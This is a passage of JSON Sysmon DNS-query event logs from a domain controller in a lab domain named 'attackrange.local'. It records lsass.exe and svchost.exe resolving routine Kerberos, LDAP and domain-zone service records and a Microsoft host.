05:47:09.688","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_kerberos._tcp.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2568,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.691\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.691","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2569,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.695\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.695","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2570,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.697\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.697","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2571,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.701\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.701","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_kerberos._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2572,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.705\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.705","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_kerberos._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2573,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.709\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _gc._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.709","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_gc._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2574,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.713\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _gc._tcp.Default-First-Site-Name._sites.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.713","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_gc._tcp.Default-First-Site-Name._sites.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2575,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.716\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _kerberos._udp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.716","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_kerberos._udp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2576,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.720\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _kpasswd._tcp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.720","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_kpasswd._tcp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2577,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.723\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _kpasswd._udp.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.723","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_kpasswd._udp.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2578,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.726\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: DomainDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.726","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"DomainDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2579,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.730\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.DomainDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.730","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.DomainDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2580,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.735\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.735","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.DomainDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2581,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.738\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: ForestDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.738","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"ForestDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2582,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.742\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.ForestDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.742","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.ForestDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2583,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.747\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: _ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.\r\nQueryStatus: 9501\r\nQueryResults: type:  6 ;10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.747","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"_ldap._tcp.Default-First-Site-Name._sites.ForestDnsZones.attackrange.local.","QueryStatus":"9501","QueryResults":"type:  6 ;10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2584,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.986\r\nProcessGuid: {A837DB8D-01B3-5F25-0000-001001540000}\r\nProcessId: 864\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\lsass.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.986","ProcessGuid":"{A837DB8D-01B3-5F25-0000-001001540000}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\lsass.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2585,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:09.990\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nProcessId: 1144\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:09.990","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2586,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.144\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010D6B80000}\r\nProcessId: 1144\r\nQueryName: win10.ipv6.microsoft.com.\r\nQueryStatus: 0\r\nQueryResults: type:  5 onpremwindows.ipv6.microsoft.com.akadns.net;type:  5 trdovmsswestus.ipv6.microsoft.com.akadns.net;52.241.128.114;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.144","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010D6B80000}","QueryName":"win10.ipv6.microsoft.com.","QueryStatus":"0","QueryResults":"type:  5 onpremwindows.ipv6.microsoft.com.akadns.net;type:  5 trdovmsswestus.ipv6.microsoft.com.akadns.net;52.241.128.114;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2587,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.239\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010E7C30000}\r\nProcessId: 1220\r\nQueryName: win-dc-881393.attackrange.local\r\nQueryStatus: 0\r\nQueryResults: fe80::10bc:13e3:f5ff:fef1;fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;\r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.239","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010E7C30000}","QueryName":"win-dc-881393.attackrange.local","QueryStatus":"0","QueryResults":"fe80::10bc:13e3:f5ff:fef1;fe80::3413:3332:6143:4f60;::ffff:10.0.1.14;","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 05:47:12","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:10","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":22,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":22,"OpcodeValue":0,"RecordNumber":2588,"ProcessID":2740,"ThreadID":3432,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Dns query:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:10.278\r\nProcessGuid: {A837DB8D-01B5-5F25-0000-0010EDC30000}\r\nProcessId: 1224\r\nQueryName: wpad\r\nQueryStatus: 9003\r\nQueryResults: \r\nImage: C:\\Windows\\System32\\svchost.exe","Category":"Dns query (rule: DnsQuery)","Opcode":"Info","UtcTime":"2020-08-01 05:47:10.278","ProcessGuid":"{A837DB8D-01B5-5F25-0000-0010EDC30000}","QueryName":"wpad","QueryStatus":"9003","Image":"C:\\Windows\\System32\\svchost.exe","EventReceivedTime":"2020-08-01 